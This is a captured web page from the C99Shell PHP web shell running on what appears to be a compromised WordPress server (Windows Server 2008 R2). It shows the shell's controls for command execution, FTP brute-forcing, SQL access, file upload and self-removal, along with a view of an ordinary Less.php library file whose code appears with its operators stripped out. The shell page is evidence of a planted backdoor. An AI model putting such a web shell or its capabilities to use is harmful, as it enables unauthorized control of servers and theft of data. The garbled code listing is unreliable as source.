!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wcp-contact-form\vendor\oyejorge\less.php\lib\Less\Tree\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Condition.php (1.46 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Condition
 *
 * @package Less
 * @subpackage tree
 */
class Less_Tree_Condition extends Less_Tree{

    public 
$op;
    public 
$lvalue;
    public 
$rvalue;
    public 
$index;
    public 
$negate;
    public 
$type 'Condition';

    public function 
__construct($op$l$r$i 0$negate false) {
        
$this->op trim($op);
        
$this->lvalue $l;
        
$this->rvalue $r;
        
$this->index $i;
        
$this->negate $negate;
    }

    public function 
accept($visitor){
        
$this->lvalue $visitor->visitObj$this->lvalue );
        
$this->rvalue $visitor->visitObj$this->rvalue );
    }

    public function 
compile($env) {
        
$a $this->lvalue->compile($env);
        
$b $this->rvalue->compile($env);

        switch( 
$this->op ){
            case 
'and':
                
$result $a && $b;
            break;

            case 
'or':
                
$result $a || $b;
            break;

            default:
                if( 
Less_Parser::is_method($a'compare') ){
                    
$result $a->compare($b);
                }elseif( 
Less_Parser::is_method($b'compare') ){
                    
$result $b->compare($a);
                }else{
                    throw new 
Less_Exception_Compiler('Unable to perform comparison'null$this->index);
                }

                switch (
$result) {
                    case -
1:
                    
$result $this->op === '<' || $this->op === '=<' || $this->op === '<=';
                    break;

                    case  
0:
                    
$result $this->op === '=' || $this->op === '>=' || $this->op === '=<' || $this->op === '<=';
                    break;

                    case  
1:
                    
$result $this->op === '>' || $this->op === '>=';
                    break;
                }
            break;
        }

        return 
$this->negate ? !$result $result;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--